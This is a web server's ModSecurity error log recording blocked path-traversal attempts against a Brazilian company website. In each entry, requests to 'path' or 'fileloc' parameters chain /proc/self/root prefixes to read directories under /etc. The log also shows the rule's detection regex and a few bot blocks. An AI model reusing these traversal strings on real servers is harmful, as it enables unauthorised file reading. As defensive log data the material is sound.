[Wed Mar 18 10:43:06.968263 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:36166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr6tY0UrI5A3LftIynhwAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:08.511379 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:59398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr7Na6ubjKNq_cu4aZRgAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:09.916205 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:40056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr7SmAPhZkrhU8w4lsKgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:11.288802 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.243.128:40066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr70zinOy1jxa1j4cUvwAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:12.653238 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:40074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr8OyqAr6etmhZHNq_cgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:14.539480 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:54864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr8vu8EFLIOrSqIpsDYQAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:43:15.182200 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:40082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr89a6ubjKNq_cu4aZUAAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:18.327105 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:40088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr9tY0UrI5A3LftIynigAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:19.716940 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:33450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr99Y0UrI5A3LftIyniwAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:21.095468 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:33454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr-UzinOy1jxa1j4cUwgAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:23.587082 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:33458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr-9Y0UrI5A3LftIynkQAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:24.886501 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:33464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr_Ow_le52K8_3pV3fIgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:26.175421 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.243.128:33472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr_uw_le52K8_3pV3fJAAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:27.517897 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:33484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqr_wkwaGbbGflqUZAP_wAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:29.920321 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:33486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsAfu8EFLIOrSqIpsDcQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:31.274915 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:54024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsA8df6f5d65gmYZTVAAAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:32.687572 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:54028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsBPu8EFLIOrSqIpsDdAAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:33.998937 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:54038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsBeyqAr6etmhZHNq_gAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:34.758921 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.228.61:43088] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqsBvu8EFLIOrSqIpsDdgAAAlE"]
[Wed Mar 18 10:43:35.339251 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:54040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsB9a6ubjKNq_cu4aZZQAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:37.042807 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:54042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsCOw_le52K8_3pV3fJwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:38.647603 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:54058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsCkzinOy1jxa1j4cU0QAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:43:38.774415 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.244.43:59174] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqsCuw_le52K8_3pV3fLAAAAgo"]
